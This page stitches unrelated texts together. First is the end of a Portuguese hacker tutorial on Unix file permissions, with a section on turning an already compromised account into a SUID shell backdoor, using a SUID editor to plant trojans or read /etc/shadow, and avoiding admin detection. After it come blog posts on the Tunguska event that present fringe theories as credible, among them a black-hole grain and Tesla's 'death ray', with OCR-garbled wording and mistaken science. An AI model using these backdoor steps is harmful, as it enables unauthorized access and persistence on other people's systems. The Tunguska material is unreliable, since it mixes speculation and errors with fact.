ao invés de alterar o arquivo apontado pelo link.

Nestas funções o primeiro parâmetro é o caminho do arquivo. O segundo e o
terceiro parâmetro é, respectivamente, o UID e GID que você quer atribuir ao
arquivo. Quando você não quer mudar o UID ou o GID é só você usar -1.
Ainda existem algumas limitações:
-> Apenas o super-usuário pode mudar o proprietário do arquivo;
-> O proprietário do arquivo pode mudar o grupo do arquivo para qualquer
um que ele faça parte;
-> O super-usuário pode mudar o grupo do arquivo para qualquer um.

Olhe este pequenino programinha (sem muita utilidade) só pra ver qual é o
esquema:

/* ——————– */
<++> Permissoes/mudar_permissoes.c
#include
#include
#include

#define PERMS 07777
#define GRUPO 666 /* O grupo que eu quero que o arquivo pertença */
#define MODE 04555 /* Permissões que eu quero que o arquivo tenha */

int main (int argc, char **argv) {
struct stat arq;

if (argc != 2) {
printf (“Uso: %s n”, argv[0]);
exit (-1);
}

if (lstat(argv[1], &arq)) {
perror (argv[1]);
exit (1);
}

printf (“ANTES:n”);
printf (“tOwnership -> UID: %d,tGID: %dn”, arq.st_uid, arq.st_gid);
printf (“tPermissões: %04onn”, arq.st_mode & PERMS);

if (lchown (argv[1], -1, GRUPO)) perror (“lchown”);
if (chmod (argv[1], MODE)) perror (“chmod”);

lstat (argv[1], &arq);
printf (“DEPOIS:n”);
printf (“tOwnership -> UID: %d,tGID: %dn”, arq.st_uid, arq.st_gid);
printf (“tPermissões: %04on”, arq.st_mode & PERMS);

return 0;
}
<–>
/* ——————– */

O programa mudará o grupo do arquivo para 666, se este GID não existir no
sistema o lchown não funcionará como desejado. O programa muda também a
permissão do arquivo para “r-sr-xr-x”, ou se preferir: 4555, de acordo com a
macro MODE definida lá em cima. Por exemplo: se você quiser tornar um
arquivo/diretório com acesso de leitura e execução para todo mundo você faria
o seguinte:
chmod (“arquivo”, 00555);
Nunca se esqueça: são sempre 5 dígitos para ser certinho!

Bom… é isso… teste uns esquemas ae e divirta-se. Com estas funções
dá pra fazer uns lances bem legais pra você verificar arquivos “perigosos”
com frequência. Enfim… tenha imaginação!

——————————————————————————-

5. Esquemas Úteis
^^^^^^^^^^^^^^

Vamos ver aqui umas coisinhas interessantes de se fazer usando SUID.
Antes vou logo avisando que para que as coisas mostradas neste tópico tenham
alguma graça você terá que adquirir nível de outro usuário. Se não sabe como
fazer isso… bem amigo… FUCE!

Digamos que você conseguiu acessar a conta de outro usuário. Não perca
tempo! Copie um shell e atribua SUID a ele
No exemplo abaixo imagine que eu seja “hack” mas consegui acessar a conta
do usuário “meleu” (não! isso não é crise de identidade!). Então eu vou e
copio um shell e atribuo SUID a ele. Veja:

/* -=-=-= exemplo =-=-=- */
meleu:~$ id
uid=1000(meleu) gid=100(users) groups=100(users),666(hack)
meleu:~$ cp /bin/ash /tmp/exemplo
meleu:~$ chmod +s /tmp/exemplo
meleu:~$ ls -l /tmp/exemplo
-rwsr-sr-x 1 meleu users 59628 Dec 9 23:47 /tmp/exemplo*
/* -=-=-= exemplo =-=-=- */

Pronto. Agora eu entro no sistema como o usuário hack e… Veja você
mesmo:

/* -=-=-= exemplo =-=-=- */
hack:/tmp$ id
uid=1005(hack) gid=100(users) groups=100(users),666(hack)
hack:/tmp$ ls -l exemplo
-rwsr-sr-x 1 meleu users 59628 Dec 9 23:47 exemplo*
hack:/tmp$ ./exemplo
u:w$ id
uid=1005(hack) gid=100(users) euid=1000(meleu) groups=100(users),666(hack)
/* -=-=-= exemplo =-=-=- */

Reparaste que o EUID mudou né? Reparaste também que o PS1 no ash não se
comporta como no bash? :P
Agora eu (hack) tenho acesso a tudo que meleu também tem. Mas felizmente
existem programadores que são pessoas preocupadas com a segurança e alguns
programas não funcionam quando você está com EUID de outro usuário. Este é o
caso do programa “ps”. Veja o exemplo:

/* -=-=-= exemplo =-=-=- */
u:w$ id
uid=1005(hack) gid=100(users) euid=1000(meleu) groups=100(users),666(hack)
u:w$ ps x
This /bin/ps is not secure for setuid operation.
/* -=-=-= exemplo =-=-=- */

Sacaste?

OBSERVAÇÃO:
Em versões anteriores deste texto eu afirmei que este esquema não
funcionava no bash. Mas recentemente, fuçando a manpage dele, eu li que se
usarmos a opção “-p” o comportamento dele para com o effective user id é
diferente do que se não for passado parâmetro algum. Desta forma, é
possível sim, fazer uma cópia de /bin/bash e atribuir SUID a esta cópia e
depois executá-la com a opção “-p”. Fiz meus testes com a versão 3.1.17.
Faça alguns testes no seu sistema aí e observe que interessante. ;-)

Este esquema eu testei no tcsh 6.08, bash 3.1.17, ash (não sei a versão),
zsh 3.0.6, e pdksh 5.2.12 (Public Domain Korn Shell). Só funcionou no ash,
zsh, pdksh, e no bash utlizando-se a opção “-p” na linha de comando.

Também é possível fazer outras coisas muito interessantes…
Uma boa a se fazer é copiar e atribuir SUID a um editor de textos. Só
testei este esquema com o “vi” (o editor mais fácil de se achar nos sistemas
que existem por aí). Tendo um editor com SUID você pode editar/criar
arquivos como se fosse o outro usuário. Consequentemente você pode
editar/criar um profile para a “vítima”, e quando falamos nisso logo
pensamos em (tchan tchan tchan!) Trojan Horses. E se você tiver um editor
SUID para root você pode mecher nos arquivos de configuração do sistema
(geralmente localizados em /etc ), visualizar o tão cobiçado /etc/shadow e
mais uma infinidade de coisas.
Isso foi só um pontapé inicial. Não vou ensinar aqui como editar profiles
e nem como fazer Trojans. Mas posso te indicar onde aprender: para aprender
a fazer/editar profiles você tem que aprender shell script e para aprender a
fazer Trojans você tem que aprender a programar. Existem diversos textos
sobre o assunto, inclusive em http://unsekurity.virtualave.net (Veja mais em
6. Referências).

ATENÇÃO: Se o administrador do sistema tiver um mínimo de competência ele
rodará um find (ver tópico 3.3.) com frequência para dar uma monitorada nos
arquivos SUID. Portanto não fique dando bobeira usando estes esquemas tão
“fuleiros”.

——————————————————————————-

6. Referências
^^^^^^^^^^^

Dominando o Linux -> Foi onde li sobre as permissões básicas e sobre
arquivos de dispositivo (do Apêndice). Este livro
já foi A Bíblia do linux, hoje em dia não sei. Estou
meio desatualizado. Podia ser comprado em
http://www.lcm.com.br
Hoje em dia não tem mais. Mas para quem lê bem em
inglês, vai em irc.nullus.net e entra no canal #bw
;-) Satisfação garantida!

Security-HOWTO -> Li sobre SUID, SGID, e sticky bit. Você pode encontrar em
http://www.tldp.org ou /usr/doc/Linux-HOWTOs

Tips-HOWTO -> A dica sobre o immutable flag encontra-se neste documento na
seção 3.3. Pode ser consultado em http://www.tldp.org ou
/usr/doc/Linux-HOWTOs

Bash-Prog-Intro-HOWTO ———,-> Textos sobre shell script. Úteis para você
Advanced Bash-Scripting Guide -’ aprender a criar/editar profiles. Ambos se
encontram em http://www.tldp.org

Cursos de Linguagem C -> Dois ótimos lugares para se aprender a programar em
Linguagem C: (português)
http://ead1.eee.ufmg.br/cursos/C
e (inglês, muito bom! voltado especificamente para
ambiente UNIX)
http://www.cs.cf.ac.uk/Dave/C/CE.html

Backdoors e Trojans -> Bom texto que explica sobre como fazer backdoors e
trojan horses, feito pelo NashLeon, algumas usando
e abusando da permissão SUID. Como não existe mais
a página da unsekurity scene, aí vai um mirror
http://www.ataliba.net/sections/old-hacking/unsekurity
Gostaria de externar o meu mais profundo
agradecimento ao cara que teve a excelente idéia
de fazer um mirror dos arquivos da unsek. Seria
uma grande perda…

Barata Eletrica n. 20 -> Tem um texto sobre UNIX e foi lá que eu vi
aquelas tabelas do topic 3.2. A URL é
http://www.inf.ufsc.br/barata/

CoreZine n. 01 -> Li sobre a parte de C. A CoreZine não existe mais e não
achei mirror algum via google. Achei um arquivo onde
tem o texto que usei:
http://www.abunasar.net/mirrors/h0h0.com/hwa/hwa-hn52.txt

man pages -> Sobre os comandos do tópico 3 e as system calls.

Linux Allocated Devices -> Maiores detalhes sobre os arquivos de
dispositivo. Você pode encontrar em
/usr/src/linux/Documentation/devices.txt

www.rootthisbox.org -,-> Dê uma olhada aqui se quiser saber mais
www.pulltheplug.com -| sobre wargames (OBS: vale muito a pena!!).
www.hackerslab.org –’

extinta mail list da unsekurity -> Se não fosse a mail list esse texto seria
um lixo ou até mesmo nem sairia!
Infelizmente (ou felizmente, depende do
ponto de vista) a lista não existe mais.

——————————————————————————-

7. Considerações Finais
——————–

Bem como esse texto é pro pessoal que está bem no começo mesmo vou dar
uma dica em forma de relato “baseado em fatos reais”. :P

O lance é que quando eu comecei a estudar profundamente permissões de
arquivos eu comecei a fuçar nos txts da vida e determinado assunto puxava
outro, e para compreender melhor o outro tinha que ler outro mais (arquivos
de dispositivo é um exemplo)… e por aí vai… E de tanto ir saltando de
txt em txt eu acabava aprendendo um monte de coisa útil.
Onde quero chegar?!
Estou querendo dizer que ao invés de ficar procurando ajuda em canais de
IRC você tem que correr atrás das infos você mesmo ou pedir indicação de um
txt pra alguém… Você acaba aprendendo muitas outras coisas!
É lógico que não é todo mundo que dispõe de tempo pra ficar fazendo isso.
Portanto não pense que estou condenando quem fica pedindo ajuda… As vezes
precisamos de uma solução rápida e talz… Mas conseguir aprender as coisas
por conta própria a muito gratificante (pelo menos pra mim).
Eu costumava apurrinhar o pessoal da extinta mail list da unsekurity com
dicas de leitura e outras coisas… Se você, fuçador iniciante, também
encontrar um meio de trocar informações vai sair lucrando! Dividir
experiências com os outros faz a informação fluir mais facilmente e vai que
alguém já passou pelo mesmo problema que você e encontrou um txt sarado
sobre o assunto! =]

Vou terminando aqui… Um abraço irmãos! E não se esqueçam de ler as
man pages sempre que houver alguma dúvida! ;)

——————————————————————————-

Apêndice.
Arquivos de Dispositivo
^^^^^^^^^^^^^^^^^^^^^^^

Os arquivos de dispositivo são um artifício para que os programas possam
interagir com os dispositivos de hardware através do kernel. Eles não são
“arquivos” de verdade (ou são?). Mas os programas os usam como se fossem, e
assim o kernel reconhece a solicitação de E/S e envia para o driver
correspondente.
Como vocês já sabem os arquivos de dispositvos ficam no /dev. Ao listar
o conteúdo do /dev com um “ls -l” você ve algo incomum. Veja um exemplo:

/* -=-=-= exemplo =-=-=- */
meleu:~$ ls -l /dev/hda2
brw-r—– 1 root disk 3, 2 Apr 27 1995 /dev/hda2
/* -=-=-= exemplo =-=-=- */

Você deve ter observado que o primeiro bit das permissões é um ‘b’ o que
mostra que é um dispositivo de bloco (ver tópico 3.2.). Mas não é disso que
falo quando digo “algo incomum”. Estou falando são destes dois números
separados por uma vírgula (3 e 2). O primeiro valor é o número maior (major)
do dispositivo e o segundo é o número menor (minor). Isso é para que o
kernel saiba que dispositivo está sendo usado. Quando um arquivo de
dispositivo é acessado o kernel recebe essa informação em forma de número
maior e número menor. O maior número especifica um determinado driver de
dispositivo do kernel e o menor número especifica exatamente qual dispositivo
será controlado pelo driver.

Olhe outro exemplo:

/* -=-=-= exemplo =-=-=- */
meleu:~$ ls -l /dev/hda*
brw-r—– 1 root disk 3, 0 Apr 27 1995 /dev/hda
brw-r—– 1 root disk 3, 1 Apr 27 1995 /dev/hda1
brw-r—– 1 root disk 3, 10 Apr 27 1995 /dev/hda10
brw-r—– 1 root disk 3, 11 Apr 27 1995 /dev/hda11
brw-r—– 1 root disk 3, 12 Apr 27 1995 /dev/hda12
brw-r—– 1 root disk 3, 13 Apr 27 1995 /dev/hda13
brw-r—– 1 root disk 3, 14 Apr 27 1995 /dev/hda14
brw-r—– 1 root disk 3, 15 Apr 27 1995 /dev/hda15
brw-r—– 1 root disk 3, 16 Apr 27 1995 /dev/hda16
brw-r—– 1 root disk 3, 2 Apr 27 1995 /dev/hda2
brw-r—– 1 root disk 3, 3 Apr 27 1995 /dev/hda3
brw-r—– 1 root disk 3, 4 Apr 27 1995 /dev/hda4
brw-r—– 1 root disk 3, 5 Apr 27 1995 /dev/hda5
brw-r—– 1 root disk 3, 6 Apr 27 1995 /dev/hda6
brw-r—– 1 root disk 3, 7 Apr 27 1995 /dev/hda7
brw-r—– 1 root disk 3, 8 Apr 27 1995 /dev/hda8
brw-r—– 1 root disk 3, 9 Apr 27 1995 /dev/hda9
/* -=-=-= exemplo =-=-=- */

Repare que o número maior de todos são iguais, isso quer dizer que para
todos estes dispositivos é usado o mesmo driver. O número menor indica ao
driver qual é o dispositivo que ele tem que executar sua função.

Para maiores informações consulte a página man do comando mknod e o
arquivo /usr/src/linux/Documentation/device.txt

——————————- E O F —————————————

Fonte: LinuxSecurity

[]’s

Grandes mistérios da humanidade:Tunguska

VonNaturAustreVe — Sat, 21 Jun 2008 05:33:01 +0000

Tunguska,1908

Semenow tinha um velho hábito: levantar-se de madrugada, preparar-se para as tarefas do dia na fazenda e, por fim, observar o horizonte, à espera do despontar do sol. Naquele dia, Semenow viu surgirem dois sóis no horizonte: Um deles terrivelmente mortal. Nâo muito longe de sua fazenda; o boiadeiro Luchektan começava a tanger 1 .500 cabeças de gado. Luchektan era de temperamento menos comtenplativo , e para ele o sol tinha uma finalidade meramente utilitária: servia para iluminar e aquecer a Terra. Mas um sol era mais do que suficiente; de bom grado teria dispensado o segundo.

Nenhum daqueles dois homens sabia – na verdade, ninguem sabia – que aquele segundo sol era algo tâo desconhecido quanto fatal. Tudo aconteceu rnuito rapidamente , naquela manhâ de 30 de junho de 1908, e como o agente causador do fenomeno nâo deixou qualquer vestígio, até hoje nâo se tem ainda a noção exata do que se passou naquela regiâo da Sibéria, entre os rios Tunguska e Lena.

Na ocasiâo – e por muito tempo – pensou-se que o local havia sido atingido por um meteoro pesando muitas toneladas. Já na década de 40 e nos anos 60, chegara-se à conclusâo de que nâo era um meteoro, mas também nâo se tinha qualquer eerteza sobre o que teria sido. Fosse o que fosse, ao atingir a Terra liberara energia superior à da mais destruidora bomba de hidrogênio. Atualmente se considera a hipótese de que naquele dia, nosso mundo tenha sido atingido apenas por um grâo de poeira cósmica, algo menor que a cabeça de um alfinete, mas de bilhôes de toneladas. Acrrdita-se que o estranho e ínfimo corpusculo nâo deixou vestígio porqu ao colidir com a Terra à velocidade de 40 mil quilometros horários , ele atravessou o planeta numa fração de tempo e saiu num ponto do Polo Norte rumando novamente espaço afora.

Em termos astronômicos, o fenomeno —- qualquer que tenha sido — foi tâo rápido e inconseqüente como se nâo tivesse acontecido . Em termos terrestres e principalmente humano, foi algo tâo terrífico que ainda hoje, passado quase setenta anos; continua deixando perplexo os que procuram entender o que aconteceu naquele dia .

Eram 7 horas da manhã , quando o fazendeiro Semenow, que contemplava o nascer do Sol, viu o céu se iluminar com uma luz fantasmagórica. Um calor sufocante o atingiu e ele ainda pôde ver um segundo sol cortando o céu a grande velocidade. 0 estranho astro desapareceu no horizonte e, antes que Semenow pudesse imaginar o que acontecia uma onda de ar quente o envolveu e o arrancou do solo; a sensaçâo, diria ele depois, era de que estava sendo consumido em chamas. Ao cair de novo no châo, perdeu os sentidos. Voltando a si, ainda atordoado e perplexo demais para pensar, olhou ao redor e levou outro susto: sua casa havia sido volatilizado, e toda a paisagem ao redor apresentava o aspecto de terra arrasada.

0 boiadeiro Luchektan tocava suas reses em meio da penumbra que se dissipava, para dar lugar ao sol que surgia. Subitamente o céu se iluminou, estranha e rapidamente demais para ser normal. Luchektan sentiu o calor de fornalha e a onda engolfante de ar quente. Antes de desmaiar, ainda viu um homem, seu cavalo, vacas e bezerros sendo arrastados. Depois, só havia devastação: algumas carcaças de gado jaziam entre os restos de vegetaçâo arrancada do solo e nada rnais; nenhum outro sinal de vida.

A 750 quilometros dalí , uma locomotiva pontilhava o ar com golfadas de fumaça e vapor, enquanto arrastava a cornposiçâo de passageiros, a maioria dos quais ressonando pesadamente depois de uma noite mal dormida. Alguns rnais despertos ouviram o rumor longinquo, abafado, indistinto. Notaram que o rumor aumentava rápidamente de intensidade; algo como o ribombar de um trovâo que viesse de encontro ao trem. Inesperadamente, os vidros das janelas quebraram- se, cortinas foram arrancadas dos suportes, a madeira estalou e partiu, o trem inteiro sacudiu, pessoas gritaram.

A onda de ar que arrasara a fazenda de Semenow e matara a boiada de Luchektan contiriuava se propagando e destruindo, com força ainda para arrancar dos trilhos um trem que trafegava a centenas de quiIometros do local onde surgiira. No caminho, ela foi secando a àgua de rios e riachos, e produziu um abalo subterrâneo que se propagou além dos limites da Sibéria e da Rússia e que foi registrado pelo sismógrafo de um observatório inglês a mais de 8 mil quilometros de distância. Paralelamente, o observatório astronômico de lrkutsk, situado na Sibéria a poucos quilometros da fronteira com a Mongólia, assinalou inexplicável alteração no campo magnético terrestre.

Cientistas se dirigiram ao local do impacto para examinar os destroços daquilo que seria um provável meteoro, e especialmente para exarninar o seu núcleo, que – acreditava-se – estaria enterrado muitos metros abaixo da cratera que forçosamente teria se formado no ponto de colisâo com a crosta terrestre. Decepçâo constrangedora: ao redor, num raio de 32 quilometros, a floresta ficara inteiramente calcinada e desaparecera todo e qualquer sinal de vida, mas nâo havia um único estilhaço de meteoro, e mais surpreendente ainda, nâo havia nenhuma cratera na área.

À falta de melhor explicação, imaginou-se que o meteoro, ao se aquecer subitamente no atrito com a atmosfera densa, desintegrara-se antes de atingir o solo razão pela qual não teria ocorrido a colisão nem se formado a inevitável cratera. Mas outros contestaram esse argumento, afirmando que em tal hipótese, os fragmentos teriam se espalhados nas redondeza e teriam sido localizados, coisa que não aconteceu. Afinal, o que teria atingido a Terra naquele dia?

Se fosse um meteoro convencional, que tivesse deixado cratera todos demais vestígios de praxe , o caso teria sido academicamente estudado, catalogado e esquecido. Porém, o mistério que cercou o fenômeno serviu para aguçar a curiosidade dos cientistas, obrigando-os a queimar uma quantidade inusitada de fosfato, na tentativa de solucionar a questão. Se não chegaram a uma conclusão, pelo menos levantaram várias hipóteses e elaboraram muitas teorias a respeito do fenômeno.

Apesar de os indícios não ajudarem, no início prevaleceu a idéia que teria sido mesmo um meteoro agente causador dos danos e abalos naquele 30 de junho. Houve mesmo quem calculasse seu peso: 40 mil toneladas, nem um grama a menos Nos anos e décadas seguintes, porém , uma das principais teorias sobre o fenômeno foi a da anti-matéria, ou do universo inverso, onde existiriam anti-astros, cujos núcleos atômicos seriam idênticos, mas opostos aos das galáxias. Nesse quadro, o que se chocou com o solo siberiano, naquela ocasião, não foi um bólido de estrutura atômica conhecida, mas um pequeno fragmento de anti-matéria, possivelmente tamanho de uma bola de pingue-pongue.

0 contato do fragmento de anti-matéria com a superfície terrestre teria provocado imensa explosâo, que liberou energia superior a qualquer bomba então conhecida. Essa teoria, lançada em meados da década da passada pelos físicos C. Atluri e Clyde Cowan, pareceu fantástica entâo, mas nâo tanto quanto à lançada no final de 1976 pelos cientistas soviéticos Vladimir Stulov e Georgi Petrov. Segundo eles, o misterio fenomeno siberiano foi provocado por uma gigantesca bola de neve, remanescente do núcleo de um cometa.

O bólido de neve, desenvolvendo uma velocidade de 40 mil quilômetros horários, penetrou na atmosfera terrestre e, graças à sua baixíssima temperatura, manteve-se incólume até chegar à altitude de 80 quilômetros. A partir daí, à medida que o caía, maior se tornou o atrito com as camadas mais densas de ar, produzindo uma coluna incandescente. Por fim, o rápido e intenso aumento de calor provocou a desintegração da esfera de gelo; resultando uma explosão tão potente que arrasou toda a espécie de vegetação num raio de dezenas de quilômetros, produziu danos a centenas de quilômetros e foi ouvida em regiões muito distantes.

Mais recente que a teoria da bola de neve a do “buraco negro” , apresentada pelos físicos norte-americanos A. A. Jackson e Michael Ryan Jr., ambos da Universidade do Texas. 0 grande problema dessa tese é que a ciência nâo sabe o que são os chamados “buracos negros” existentes no céu. Tudo o que existe até agora sobre esse fenômeno sideral sâo conjecturas.

Explicar o incompreensível por meio de algo desconhecido não faz sentido. Aliás, na própria palavra buraco está implícita a idéia de inexistência. Então, nosso planeta teria sido atingido por algo que não existe? “Buraco negro” é uma região do céu onde aparentemente não existe nada, exceto a tal negritude que lhe dá o nome, mas de onde ; provem poderosas emissões de raios X perfeitamente captáveis na Terra. Várias hipóteses têm sido levantadas na tentativa de explicar o que sejam esses pontos do espaço. Segundo uma delas, os “buracos negros” sâo astros constituídos por anti matéria de estrutura nuclear inversa à da matéria comum, o que os torna invisíveis aos nossos olhos. Se isso for correto estaria certa a teoria de Atluri e Cowan de que a desintegraçâo de um corpo sideral de anti matéria ocorrida em era remota teria lançado fragmentos por todo o espaço, um dos quais acabou se chocando com a Terra.

De acordo com outra hipótese, os “buracos negros” são corpos celestes formados de uma matéria tão densa e tão extraordinariamente brilhante que os seus raios estarianü situados numa faixa não perceptível aos nossos olhos . Daí a razâo pela qual, nos pontos do espaço ocupados por eles; tem a impressâo de que há uma espécie de vácuo ou buraco. Impressão falsa, corno o demonstram fortes ondas de rádio precedente desses pontos . Os físicos Jackson e Ryan Jr. inclinam-se por essa teoria ao dizer que o vale entre as bacias do Tunguska e do Lena teria sido atingido por um fragmento de “buraco negro” menor que a cabeça de um alfinete, mas pesando bilhões de toneladas em virtude de sua densi dade.

Esse micro meteoro, ao penetrar na atmosfera terrestre, teria provocado ondas de choque e produzido uma coluna incandescente e azulada extremamente quente, ao se deslocar È velocidade de 40 mil quilômetros por hora. Simples grão de poeira cósmica, penetrou no solo sem deixar vestígio, atravessou o planeta e continuou sua viagem sem rumo e sem fim pelo universo. Segundo os físicos americanos, não foi o impacto com o solo que cau sou o cataclismo e sim a deflagração de ondas de choque decorrentes do aquecimento súbito da atmosfera no ponto em que surgiu a coluna ígnea gerada pelo deslocamento do corpúsculo.

Teoria ousada, sem dúvida, mas não destituída de fundamento Para apoiá-la, os dois cientistas estudaram os depoimentos de testemunhas da época: Velhos moradores de Tunguska recordararn-se de que naquela manhã tiveram sua atenção despertada por uma sucessão de explosões vindas do céu. Olhando para cima, virarn uma longa e fina coluna de fogo ázulado riscando o firmamento de alto a baixo, ao mesmo tempo que um trovão intermitente e profundo parecia abalar o próprio mundo. Até que a faixa incandescente atingiu a Terra em algum ponto além do horizonte, deixando atrás de si a terra queimada e arrasada.

Ao lado dessas teorias , todas plausiveis embora discutíveis; há os que vêem naquele fenôrneno nada mais do que uma explosão nuclear; de potência ignorada, na época como agora. Acontece que a primeira bomba atômica construída pelo Homem explodiu à 16 de julho de I945, ou seja, 37 anos depois e, ainda assim, a energia liberada peto artefato deflagrado em Alamogordo, nos Estados Unidos, equivalia a 20 mil toneladas de dinamite, bem inferior à explosão ocorrida em Tunguska.

A conclusão é inevitável: se o fenômeno observado naquela regïão siberiana foi o resultado de uma deflagração nuclear, tem-se necessariamente de admitir que esta terá sido provocada por uma inteligência extraterrestre. Mas por quem e por que? Duas hipóteses procuram explicar o que teria ocorrido. Uma delas, apresentada pelo professor Liapunov, da União Soviética, diz que um aparelho vindo de outro planeta, impulsionado a energia nuclear, teria sofrido uma pane, se desgovernado e precipitado a uma velocidade vertiginosa, provocando a incandescência da nave pelo atrito com a atmosfera . Não se encontrou nenhum vestígio na área por que o combustível atômico se desintegrou ao explodir ao choque contra o solo, volatilizando aparelho e tripulantes.

A segunda hipótese , recebida com reservas mesmo pelos que defendem a existência de seres extra-terrenos inteligentes, afirma que o estranho objeto que explodiu na Terra foi urn míssel disparado de outro planeta, acidental ou propositadamente.

Bomba atômica fabricada na Terra, aparelho acidentado ou míssil extraterrestres , a hipótese de explosão nuclear ganhou certo peso depois que pesquisas realizadas por cientistas norte-americanos , em meados da década passada, revelaram que , após a explosão de 1908 , houve um aumento elevado de radioatividade na atmosfera, conforme análises feitas em amostras vegetais da época. Mas nem isso leva a uma conclusão definitiva.

E a duvida permanece: cometa , meteoro , particula de anti-matéria, “buraco negro”, disco voador , ou o que?

Por enquanto, só uma certeza : alguma coisa explodiu na Terra naquela manhã de 1908 e até hoje ninguém sabe o que foi.

Diga-se que vêm a propósito a seguinte noticia em http://www.tsf.pt/online/ciencia/interior.asp?id_artigo=TSF153216

CIÊNCIA Descobertos destroços de nave extra-terreste, segundo russos Cientistas russos afirmam que encontraram os destroços de uma nave espacial extra-terrestre que se despenhou em 1908 em Tunguska, na Sibéria, anunciou quarta-feira à noite a agência noticiosa Interfax. ( 10:19 / 12 de Agosto 04 )

Os cientistas, ligados ao Fundo do Fenômeno Espacial de Tunguska, encontraram também no local uma pedra de 50 quilos que levaram para análise em Krasnoyarsk, na Sibéria.

O cataclismo de Tunguska, ocorrido numa zona desértica da Sibéria, continua a constituir um dos maiores mistérios científicos do século XX.

A 30 de Junho de 1908, o que se julga ter sido um meteorito explodiu a alguns quilômetros de Tunguska, provocando uma onda de choque sentida em centenas de quilómetros em redor e devastando uma zona de dois mil quilômetros quadrados de floresta siberiana.

A natureza exata do corpo que explodiu e a sua origem continuam um verdadeiro mistério.

fonte

Existe a historia de um físico chamado nikola tesla, em que é falado sobre o “raio da morte”:

“O Raio da Morte:

Uma vez que as invenções de Tesla geralmente continham em sí um elemento de consciência social, ou obra pela humanidade, pode parecer surpreendente que ele tenha criado uma série de dispositivos com aplicações militares, e a noção de Tesla utilizando seu gênio para propósitos bélicos é imensamente assustadora. Afinal, este é o homem que se vangloriava do fato que seu gerador ressonante poderia dividir a Terra ao meio, e ninguém até hoje soube ao certo se ele estava brincando.

A primeira invenção de Tesla com propósito militar utilizava uma espécie de automação tecnológica, com a qual o trabalho de seres humanos poderia ser substituído por máquinas. Especificamente, Tesla produzia barcos e submarinos controlados remotamente. Ele demonstrou o navio por controle remoto em uma exposição no Madison Square Garden, em 1898. O aparato era tão avançado que até mesmo usava uma espécie de reconhecimento vocal para responder aos comandos verbais de Tesla e voluntários do público.

Em público, Tesla falou das virtudes humanitárias da invenção: ela iria impedir que vários trabalhadores arriscassem suas vidas. Mas Tesla realmente estava esperando um contrato com o exército dos Estados Unidos. Em uma apresentação para o departamento de guerra, Tesla argumentou que sua invenção poderia obliterar a armada espanhola, e acabar com a guerra com a Espanha em uma tarde. O governo nunca aceitou a oferta de Tesla.

Tesla, então, deciciu direcionar o submarino automático à industria privada, e procurou a aprovação de J. P. Morgan. Segundo contam, Morgan ofereceu-se para fabricar os barcos de Tesla se este se casasse com sua filha. Tal acordo era um anátema a Tesla, e os dois nunca mais trabalhariam juntos até Wardenclyffe, alguns anos mais tarde.

Tesla eventualmente conseguiu um contrato militar bem sucedido: com a marinha alemã, O produto não eram seus barcos a controle remoto, mas turbinas sofisticadas que o almirante Von Tirpits usou com grande sucesso em sua armada de navios de guerra. Depois que J. P. Morgan cortou seu apoio a Tesla, este contrato tornou-se sua única fonte de renda. Quando do advento da primeira guerra mundial, Tesla cancelou seu contrato com os alemães, para não ser acusado de traição.

Quase falido e observando os Estados Unidos à beira da guerra, Tesla sonhou com outra invenção que pudesse interessar os militares: o raio da morte.

O mecanismo por detrás do raio da morte não é bem compreendido até hoje. Ele era aparentemente uma espécie de acelerador de partículas. Tesla disse que ele era uma melhoria de seu transformador amplificador, que concentrava energia em um fino raio tão concentrado que ele não se dispersaria, mesmo a grandes distâncias. Ele o promoveu como uma arma puramente defensiva, com a intenção de impedir ataques, fazendo de seu raio da morte o tataravô da defesa estratégica.

Não se sabe ao certo se Tesla usou seu raio da morte, ou se ele sequer chegou a contruí-lo. Mas o seguinte é a história geralmente relatada do que aconteceu naquela noite em 1908, quando Tesla testou sua arma.

Naquela época, Robert Peary estava fazendo sua segunda tentativa em se chegar ao polo norte. Criptocamente, Tesla notificou a expedição que eles estariam tentando entrar em contato com eles de alguma forma, e eles deveriam relatar qualquer coisa incomum que eles observassem. Na noite de 30 de junho, acompanhado por seu associado, George Scherff, na torre de Wardenclyffe, Tesla apontou seu raio através do atlântico, para o ártico, a um ponto calculado como estando a oeste da expedição de Peary.

Tesla ligou o equipamento. De início, era difícil dizer que ele estava funcionando. Sua extremidade emitiu uma luz pálida, dificilmente notável. Então, uma coruja voou de seu ninho no topo da torre, na direção do raio, e foi desintegrada instantâneamente.

Isso concluiu o teste. Tesla observou os jornais e enviou telegramas para Peary na esperança de confirmar a efetividade do raio da morte. Nada apareceu. Tesla estava pronto para admitir derrota quando recebeu notícias de um estranho evento ocorrido na Sibéria.

Em 30 de junho, uma enorme explosão havia devastado Tunguska, uma área remota na floresta da Sibéria. Quinhentos mil acres quadrados de terra foram instantâneamente destruídos, o equivalente a quinze megatons de TNT. O incidente de Tunguska é a mais poderosa explosão ocorrida na história, nem mesmo subsequentes explosões termonucleares ultrapassaram sua força. A explosão foi audível a 930 quilômetros de distância, aproximadamente.Os cientistas crêem que ela foi causada por um meteorito ou fragmento de um cometa, embora nenhum impacto evidente ou restos minerais de tal objeto jamais tenham sido encontrados.

Nikola Tesla tinha uma explicação diferente. Ela claro para ele que seu raio da morte tinha ultrapassado seu alvo calculado e atingido Tunguska. Ele ficou extremamente grato que a explosão, miraculosamente, não matou ninguém. Tesla desmontou o raio da morte imediatamente, crendo-o muito perigoso para continuar existindo.

Seis anos mais tarde, o fim da primeira guerra fez com que Tesla reconsiderasse. Ele escreveu ao presidente Wilson, revelando o segredo do teste do raio da morte, orefecendo-se para reconstruí-lo para o departamento de Guerra. A mera ameaça de tamanha força destrutiva faria com que as nações em guerra concordassem em estabelecer-se a paz imediatamente.

A única resposta de Tesla à sua proposta foi uma carta formal de apreciação da secretária do presidente. O raio da morte nunca foi reconstruído, supondo que ele tenha sido construído, em primeiro lugar.

Tesla fez mais uma tentativa de ajudar seu país na guerra em 1917. Ele concebeu uma estação emissora que emitiria ondas exploratórias de energia, permitindo que seus operadores determinassem com precisão a localização de veículos inimigos distantes. O departamento de guerra riu-se e rejeitou o “raio explorador” de Tesla.

Uma geração mais tarde, esta mesma invenção ajudaria os aliados a vencer a segunda guerra mundial. Ela era chamada radar.”

Informações um pouco mais recentes sobre o ocorrido.

“Uma expedição de cientistas italianos pode ter encontrado, em um lago da Sibéria, a explicação para o chamado “evento de Tunguska” – uma explosão que ocorreu sobre o norte da Rússia em 1908, destruindo vegetação por mais de 2.000 km2 e gerando tremores de terra e uma luz súbita nos céus, observada em partes da Europa e da Ásia.
